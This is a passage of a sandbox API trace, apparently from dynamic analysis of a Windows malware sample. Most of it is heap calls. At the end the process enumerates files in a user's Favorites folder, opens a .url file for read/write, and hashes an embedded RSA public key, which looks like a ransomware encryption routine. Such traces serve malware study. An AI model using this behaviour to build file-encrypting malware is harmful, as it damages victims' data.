lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.090] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.090] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0197.091] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.091] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.091] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.092] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0197.092] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.092] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.092] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.092] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0197.093] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.093] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.093] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.093] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0197.093] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.094] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.094] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.094] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0197.094] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.095] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0197.095] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.096] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.096] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.096] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0197.096] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0197.096] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.097] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0197.097] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.097] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.097] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0197.097] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.098] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.098] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.098] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0197.098] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.098] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.098] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.098] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0197.099] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.099] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.099] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.099] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0197.100] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.100] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.100] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.100] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0197.100] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.101] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.101] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.101] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0197.101] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0197.101] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.102] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0197.102] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.102] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.102] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0197.102] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.103] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.103] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.103] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0197.103] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.104] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.104] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.104] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0197.104] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.104] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.104] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.104] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0197.105] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.105] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.105] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.105] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0197.106] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.106] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.106] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.106] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0197.106] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.107] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.107] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.107] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0197.107] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.107] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.107] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.107] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0197.108] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.108] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.108] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.108] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0197.108] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.109] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.109] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.109] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0197.109] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0197.109] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.109] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0197.109] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.109] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.109] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0197.110] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.110] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.110] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.110] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0197.111] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.111] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.111] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.111] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0197.112] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.112] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.112] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.112] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0197.112] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.113] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.113] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.113] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0197.113] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.113] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.114] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.114] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0197.114] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0197.114] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.114] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0197.115] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0197.115] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.115] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0197.116] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.116] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.116] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.116] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0197.116] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.117] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.117] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.117] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0197.117] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.117] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.117] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.118] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0197.118] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.118] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.118] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.118] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0197.119] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0197.119] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.119] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.119] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\") returned="Microsoft Websites\\" [0197.119] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0197.119] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95140 [0197.120] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.120] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\") returned="Favorites\\" [0197.120] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0197.120] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95140 | out: hHeap=0x620000) returned 1 [0197.120] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0197.120] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0197.120] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0197.120] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0197.121] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0197.121] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0197.121] PathFindFileNameW (pszPath="") returned="" [0197.121] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.121] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\*" (normalized: "c:\\users\\keecfmwgj\\favorites\\microsoft websites\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0197.123] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.123] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.123] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee50dc0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IE Add-on site.url", cAlternateFileName="IEADD-~1.URL")) returned 1 [0197.123] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.123] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa6) returned 0x2c6ead8 [0197.123] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.123] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\IE Add-on site.url") returned=".url" [0197.123] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\microsoft websites\\ie add-on site.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0197.134] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=133) returned 1 [0197.135] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0197.137] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.137] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0197.138] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0197.139] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0197.139] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0197.139] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x85, lpOverlapped=0x0) returned 1 [0197.139] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.139] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0197.139] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.139] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.139] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0197.141] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0197.141] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0197.141] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0197.141] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0197.141] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0197.141] GetLastError () returned 0x0 [0197.141] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0197.141] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0197.141] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0197.141] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0197.141] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0197.141] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd95d8 [0197.141] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0197.141] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0197.141] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0197.141] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0197.142] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0197.142] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0197.142] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0197.142] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd95d8 [0197.142] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 